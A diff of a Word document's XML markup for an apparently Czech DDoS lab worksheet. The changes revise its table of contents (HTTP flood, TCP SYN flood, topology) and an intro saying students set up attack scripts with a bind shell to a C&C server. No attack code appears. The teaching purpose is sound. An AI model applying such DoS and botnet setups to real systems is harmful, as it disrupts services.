gAAAAAAAAAhAPqZJHMnJAAAJyQAABQAAAAAAAAAAAAAAAAA&#10;OCgAAGRycy9tZWRpYS9pbWFnZTIuanBnUEsBAi0AFAAGAAgAAAAhABWWgnDcAAAABQEAAA8AAAAA&#10;AAAAAAAAAAAAkUwAAGRycy9kb3ducmV2LnhtbFBLAQItABQABgAIAAAAIQB7wDiSwwAAAKUBAAAZ&#10;AAAAAAAAAAAAAAAAAJpNAABkcnMvX3JlbHMvZTJvRG9jLnhtbC5yZWxzUEsFBgAAAAAHAAcAvgEA&#10;AJROAAAAAA==&#10;">
+                <v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
+                  <v:stroke joinstyle="miter"/>
+                  <v:formulas>
+                    <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+                    <v:f eqn="sum @0 1 0"/>
+                    <v:f eqn="sum 0 0 @1"/>
+                    <v:f eqn="prod @2 1 2"/>
+                    <v:f eqn="prod @3 21600 pixelWidth"/>
+                    <v:f eqn="prod @3 21600 pixelHeight"/>
+                    <v:f eqn="sum @0 0 1"/>
+                    <v:f eqn="prod @6 1 2"/>
+                    <v:f eqn="prod @7 21600 pixelWidth"/>
+                    <v:f eqn="sum @8 21600 0"/>
+                    <v:f eqn="prod @7 21600 pixelHeight"/>
+                    <v:f eqn="sum @10 21600 0"/>
+                  </v:formulas>
+                  <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+                  <o:lock v:ext="edit" aspectratio="t"/>
+                </v:shapetype>
+                <v:shape id="Picture 44" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;left:6508;top:25;width:7201;height:7201;visibility:visible;mso-wrap-style:square" o:gfxdata="UEsDBBQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAW0NvbnRlbnRfVHlwZXNdLnhtbHyQz07DMAyH&#10;70i8Q+QralM4IITa7kDhCAiNB7ASt43WOlEcyvb2pNu4IODoPz9/n1xv9vOkForiPDdwXVagiI23&#10;jocG3rdPxR0oScgWJ8/UwIEENu3lRb09BBKV0ywNjCmFe63FjDSjlD4Q50nv44wpl3HQAc0OB9I3&#10;VXWrjedEnIq03oC27qjHjympx31un0wiTQLq4bS4shrAECZnMGVTvbD9QSnOhDInjzsyuiBXWQP0&#10;r4R18jfgnHvJr4nOknrFmJ5xzhraRtHWf3Kkpfz/yGo5S+H73hkquyhdjr3R8m2lj09svwAAAP//&#10;AwBQSwMEFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAABfcmVscy8ucmVsc2zPwWrDMAwG4Ptg72B0&#10;X5TuUMaI01uh19I+gLGVxCy2jGSy9e1nemrHjpL4P0nD4SetZiPRyNnCruvBUPYcYp4tXC/Htw8w&#10;Wl0ObuVMFm6kcBhfX4Yzra62kC6xqGlKVgtLreUTUf1CyWnHhXKbTCzJ1VbKjMX5LzcTvvf9HuXR&#10;gPHJNKdgQU5hB+ZyK23zHztFL6w81c5zQp6m6P9TMfB3PtPWFCczVQtB9N4U2rp2HOA44NMz4y8A&#10;AAD//wMAUEsDBBQABgAIAAAAIQCa+BazwwAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvQv/D8gq96UYRrdFVNFBob9V68PjIPrPR7NuYXWP8911B8DjMzDfMYtXZSrTU+NKxguEgAUGc&#10;O11yoWD/99X/BOEDssbKMSm4k4fV8q23wFS7G2+p3YVCRAj7FBWYEOpUSp8bsugHriaO3tE1FkOU&#10;TSF1g7cIt5UcJclEWiw5LhisKTOUn3dXq8BessPpXrb5zGszqbNpd/n53Sj18d6t5yACdeEVfra/&#10;tYLxGB5f4g+Qy38AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAmvgWs8MAAADbAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;">
+                  <v:imagedata r:id="rId10" o:title=""/>
+                </v:shape>
+                <v:shape id="Picture 46" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;width:6515;height:7809;visibility:visible;mso-wrap-style:square" o:gfxdata="UEsDBBQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAW0NvbnRlbnRfVHlwZXNdLnhtbHyQz07DMAyH&#10;70i8Q+QralM4IITa7kDhCAiNB7ASt43WOlEcyvb2pNu4IODoPz9/n1xv9vOkForiPDdwXVagiI23&#10;jocG3rdPxR0oScgWJ8/UwIEENu3lRb09BBKV0ywNjCmFe63FjDSjlD4Q50nv44wpl3HQAc0OB9I3&#10;VXWrjedEnIq03oC27qjHjympx31un0wiTQLq4bS4shrAECZnMGVTvbD9QSnOhDInjzsyuiBXWQP0&#10;r4R18jfgnHvJr4nOknrFmJ5xzhraRtHWf3Kkpfz/yGo5S+H73hkquyhdjr3R8m2lj09svwAAAP//&#10;AwBQSwMEFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAABfcmVscy8ucmVsc2zPwWrDMAwG4Ptg72B0&#10;X5TuUMaI01uh19I+gLGVxCy2jGSy9e1nemrHjpL4P0nD4SetZiPRyNnCruvBUPYcYp4tXC/Htw8w&#10;Wl0ObuVMFm6kcBhfX4Yzra62kC6xqGlKVgtLreUTUf1CyWnHhXKbTCzJ1VbKjMX5LzcTvvf9HuXR&#10;gPHJNKdgQU5hB+ZyK23zHztFL6w81c5zQp6m6P9TMfB3PtPWFCczVQtB9N4U2rp2HOA44NMz4y8A&#10;AAD//wMAUEsDBBQABgAIAAAAIQB6gxFzxgAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9PawIx&#10;FMTvQr9DeAVvmm0VKatR2kKreND6B9bjY/PcbLt52W6ibr+9KQgeh5n5DTOZtbYSZ2p86VjBUz8B&#10;QZw7XXKhYL/76L2A8AFZY+WYFPyRh9n0oTPBVLsLb+i8DYWIEPYpKjAh1KmUPjdk0fddTRy9o2ss&#10;hiibQuoGLxFuK/mcJCNpseS4YLCmd0P5z/ZkFRzX+WA9z7LwtVxVeMh+zffn4k2p7mP7OgYRqA33&#10;8K290AqGI/j/En+AnF4BAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAeoMRc8YAAADbAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;">
+                  <v:imagedata r:id="rId11" o:title=""/>
+                </v:shape>
+                <w10:anchorlock/>
+              </v:group>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
@@ -68,7 +123,7 @@
       <w:pPr>
         <w:pStyle w:val="Nadpis1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc192000145"/>
+      <w:bookmarkStart w:id="0" w:name="_Toc192341151"/>
       <w:r>
         <w:t xml:space="preserve">Pracovní list – Scénáře na HTTP </w:t>
       </w:r>
@@ -90,8 +145,11 @@
       </w:r>
       <w:bookmarkEnd w:id="0"/>
     </w:p>
-    <w:p/>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:firstLine="0"/>
+      </w:pPr>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:rPr>
@@ -120,8 +178,6 @@
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -142,7 +198,7 @@
         </w:rPr>
         <w:fldChar w:fldCharType="separate"/>
       </w:r>
-      <w:hyperlink w:anchor="_Toc192000145" w:history="1">
+      <w:hyperlink w:anchor="_Toc192341151" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hypertextovodkaz"/>
@@ -169,7 +225,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc192000145 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc192341151 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -209,11 +265,9 @@
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc192000146" w:history="1">
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc192341152" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hypertextovodkaz"/>
@@ -240,7 +294,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc192000146 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc192341152 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -280,11 +334,9 @@
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc192000147" w:history="1">
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc192341153" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hypertextovodkaz"/>
@@ -311,7 +363,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc192000147 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc192341153 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -331,7 +383,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>1</w:t>
+          <w:t>2</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -351,17 +403,15 @@
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc192000148" w:history="1">
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc192341154" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hypertextovodkaz"/>
             <w:noProof/>
           </w:rPr>
-          <w:t>Instrukce</w:t>
+          <w:t>Teoretické informace</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -382,7 +432,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc192000148 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc192341154 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -422,17 +472,15 @@
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc192000149" w:history="1">
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc192341155" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hypertextovodkaz"/>
             <w:noProof/>
           </w:rPr>
-          <w:t>Část 1. Zavedení topologie</w:t>
+          <w:t>DOS typu HTTP flood</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -453,7 +501,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc192000149 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc192341155 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -474,6 +522,351 @@
             <w:webHidden/>
           </w:rPr>
           <w:t>2</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Obsah2"/>
+        <w:tabs>
+          <w:tab w:val="right" w:leader="dot" w:pos="10061"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc192341156" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hypertextovodkaz"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>DOS typu TCP SYN flood</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc192341156 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>2</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Obsah1"/>
+        <w:tabs>
+          <w:tab w:val="right" w:leader="dot" w:pos="10061"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc192341157" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hypertextovodkaz"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Instrukce</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc192341157 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>3</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Obsah2"/>
+        <w:tabs>
+          <w:tab w:val="right" w:leader="dot" w:pos="10061"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc192341158" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hypertextovodkaz"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Část 1. Úvod k DoS</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc192341158 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>3</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Obsah2"/>
+        <w:tabs>
+          <w:tab w:val="right" w:leader="dot" w:pos="10061"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc192341159" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hypertextovodkaz"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Část 2. Popis topologie</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc192341159 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>3</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Obsah2"/>
+        <w:tabs>
+          <w:tab w:val="right" w:leader="dot" w:pos="10061"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc192341160" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hypertextovodkaz"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Část 2,5. Replikace topologie (pro přednášející)</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc192341160 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>4</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -491,10 +884,11 @@
           <w:tab w:val="right" w:leader="dot" w:pos="10061"/>
         </w:tabs>
         <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc192000150" w:history="1">
+      <w:hyperlink w:anchor="_Toc192341161" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hypertextovodkaz"/>
@@ -521,7 +915,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc192000150 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc192341161 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -541,7 +935,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>2</w:t>
+          <w:t>4</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -559,10 +953,11 @@
           <w:tab w:val="right" w:leader="dot" w:pos="10061"/>
         </w:tabs>
         <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc192000151" w:history="1">
+      <w:hyperlink w:anchor="_Toc192341162" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hypertextovodkaz"/>
@@ -589,7 +984,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc192000151 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc192341162 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -609,7 +1004,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>3</w:t>
+          <w:t>4</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -627,10 +1022,11 @@
           <w:tab w:val="right" w:leader="dot" w:pos="10061"/>
         </w:tabs>
         <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc192000152" w:history="1">
+      <w:hyperlink w:anchor="_Toc192341163" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hypertextovodkaz"/>
@@ -657,7 +1053,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc192000152 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc192341163 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -677,7 +1073,76 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>3</w:t>
+          <w:t>5</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Obsah2"/>
+        <w:tabs>
+          <w:tab w:val="right" w:leader="dot" w:pos="10061"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc192341164" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hypertextovodkaz"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Část 3.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc192341164 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>7</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -695,7 +1160,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
           <w:b w:val="0"/>
           <w:sz w:val="22"/>
         </w:rPr>
@@ -706,7 +1171,7 @@
       <w:pPr>
         <w:pStyle w:val="Nadpis2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc192000146"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc192341152"/>
       <w:r>
         <w:t>Úvod</w:t>
       </w:r>
@@ -722,13 +1187,25 @@
         <w:rPr>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Tento pracovní list slouží pro procvičení základních znalostí ohledně </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve">Tento pracovní list slouží </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:t>na</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> procvičení základních znalostí ohledně </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>DDoS</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
@@ -777,62 +1254,59 @@
         <w:rPr>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">V průběhu práce student bude konfigurovat základní prvky pro nadstavbu scénářů, nastaví scripty pro funkčnost celého útoku jako, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve">V průběhu práce student </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>bind</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>bude konfigurovat základní prvky pro nadstavbu scénářů</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>, nastaví scripty pro funkčnost celého útoku jako, bind shell na CnC server a scripty pro komunikaci s </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>shell</w:t>
